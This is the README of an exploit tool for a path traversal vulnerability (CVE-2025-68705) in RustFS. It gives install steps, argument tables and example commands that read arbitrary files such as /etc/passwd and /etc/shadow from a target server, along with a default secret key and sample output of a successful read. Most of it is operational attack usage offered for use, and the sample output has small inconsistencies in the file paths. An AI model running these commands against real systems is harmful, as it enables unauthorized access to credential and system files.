# CVE-2025-68705 - RustFS Path Traversal Exploit

## Description

This script exploits a path traversal vulnerability (CVE-2025-68705) in RustFS that allows reading arbitrary files on the server.


## Requirements

- Python 3.6+
- See `requirements.txt` for dependencies

## Installation

```bash
git clone https://github.com/yourusername/CVE-2025-68705.git
cd CVE-2025-68705
pip install -r requirements.txt
```

## Usage

```bash
python exp.py -H <host> -p <port> -f <file_path> [-s <secret>]
```

### Required Arguments

| Argument | Description |
|----------|-------------|
| `-H, --host` | Target host IP or hostname |
| `-p, --port` | Target port number |
| `-f, --file` | File path to read (optional with --check-only) |

### Optional Arguments

| Argument | Description | Default |
|----------|-------------|---------|
| `-s, --secret` | Secret key for signature | `rustfsadmin` |
| `-o, --offset` | File read offset | `0` |
| `-l, --length` | Number of bytes to read | `4096` |
| `--check-only` | Only check if target is vulnerable | - |

## Examples

### Read /etc/passwd file

```bash
python exp.py -H 192.168.1.128 -p 9000 -f /etc/passwd
```

### Read /etc/shadow with custom offset and length

```bash
python exp.py -H 192.168.1.128 -p 9000 -f /etc/shadow -o 0 -l 1024
```

### Use custom secret key

```bash
python exp.py -H 192.168.1.128 -p 9000 -f /etc/hosts -s customsecret
```

### Only check if target is vulnerable

```bash
python exp.py -H 192.168.1.128 -p 9000 --check-only
```

### Read specific range of file

```bash
python exp.py -H 192.168.1.128 -p 9000 -f /etc/passwd -o 100 -l 200
```

## Output Example

```
python ./exp.py -H 192.168.1.128 -p 19010 -f ../../../../etc/hosts -o 0 -l 100
[*] Target: 192.168.1.128:19010
[*] Secret: rustfsadmin
--------------------------------------------------
[*] Checking for CVE-2025-68705 vulnerability...
[*] Exploiting CVE-2025-68705 against 192.168.1.128:19010
[*] Reading file: ../../../../etc/passwd
[+] Target is VULNERABLE!
--------------------------------------------------
[*] Exploiting CVE-2025-68705 against 192.168.1.128:19010
[*] Reading file: ../../../../../../../../etc/hosts
[+] Successfully read file!

[+] File content (offset=0, length=100):
--------------------------------------------------
127.0.0.1       localhost
::1     localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastp
```

## License

This project is licensed under the MIT License - see the LICENSE file for details.

## References

- [RustFS Security Advisory](https://github.com/rustfs/rustfs/security/advisories/GHSA-pq29-69jg-9mxc)
- [CVE-2025-68705](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-68705)


